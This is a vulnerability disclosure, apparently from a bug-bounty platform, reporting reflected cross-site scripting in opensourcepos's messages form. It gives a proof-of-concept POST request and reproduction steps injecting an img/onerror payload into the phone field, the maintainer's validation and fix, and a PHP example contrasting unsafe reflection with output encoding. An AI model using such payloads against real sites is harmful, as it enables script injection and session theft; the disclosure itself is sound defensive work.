Cross-site Scripting (XSS) - Reflected in opensourcepos/opensourcepos

Valid

Reported on

Sep 26th 2021


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

// PoC POST Request:

https://demo.opensourcepos.org/messages/send/

Data:


-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="csrf_ospos_v3"

1777de6e2b0d2a6675dff04122423523
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="phone"

xss"><img src=x onerror=alert(5)>
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="message"

xss"><img src=x onerror=alert(5)>
-----------------------------154649713830222785181286818375
Content-Disposition: form-data; name="submit_form"

Senden
-----------------------------154649713830222785181286818375--



Impact

This vulnerability is capable of claiming other users' cookies and performing other advanced scenarios. Account takeover is possible in this case.

We have contacted a member of the opensourcepos team and are waiting to hear back 2 months ago
2 months ago

Maintainer


This POST data is not read or stored from and loads from an empty form when you open the page. How can it then reach another user?

0x9x
2 months ago

Researcher


I know, cuz I didn't mention the full request. BTW you can follow these steps to reproduce the vulnerability.

1- Go to -> https://demo.opensourcepos.org/messages
2- Inject "><img src=x onerror=alert(5)> in the Phone number input.
3- You will get a message unsuccessfully sent to "injected payload" and you will get the alert.

opensourcepos/opensourcepos maintainer validated this vulnerability 2 months ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on 2b031e 2 months ago
jekkos has been awarded the fix bounty
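
The reproduction steps above show the submitted phone value echoed back inside the "unsuccessfully sent to" message. The following is an added example, not opensourcepos code and not the fix merged in 2b031e: it contrasts unencoded reflection with output encoding plus allowlist validation, in PHP (the project's language). The function names, the markup and the accepted phone format are assumptions.

```php
<?php
// Added example, not opensourcepos code. Function names, markup and the
// message wording are hypothetical, modelled on the reproduction steps.

// Vulnerable pattern: the submitted phone value is concatenated into the
// status message and rendered as HTML without encoding.
function failure_message_unsafe(string $phone): string
{
    return '<div class="alert">Message unsuccessfully sent to ' . $phone . '</div>';
}

// Hardened pattern 1: encode for the HTML context at the point of output,
// so quotes and angle brackets cannot close the text node or open a tag.
function failure_message_safe(string $phone): string
{
    $encoded = htmlspecialchars($phone, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="alert">Message unsuccessfully sent to ' . $encoded . '</div>';
}

// Hardened pattern 2: allowlist validation before the value is used at all.
// Assumed format: optional leading +, then 6 to 20 digits, spaces, dots,
// hyphens or parentheses.
function is_plausible_phone(string $phone): bool
{
    return preg_match('/\A\+?[0-9 ().\-]{6,20}\z/', $phone) === 1;
}

// Constructed sample input: the value from the report and an ordinary number.
$samples = ['xss"><img src=x onerror=alert(5)>', '+32 470 12 34 56'];

foreach ($samples as $phone) {
    $verdict = is_plausible_phone($phone) ? 'accepted' : 'rejected';
    echo "input:    $phone\n";
    echo "validate: $verdict\n";
    echo "unsafe:   " . failure_message_unsafe($phone) . "\n";
    echo "safe:     " . failure_message_safe($phone) . "\n\n";
}
```

Validation alone is not sufficient, because any field that must accept free text (such as the message body) still needs encoding where it is written into the page. If the status message is returned as JSON and inserted by client-side script, the same encoding applies at the point where it is written into the DOM.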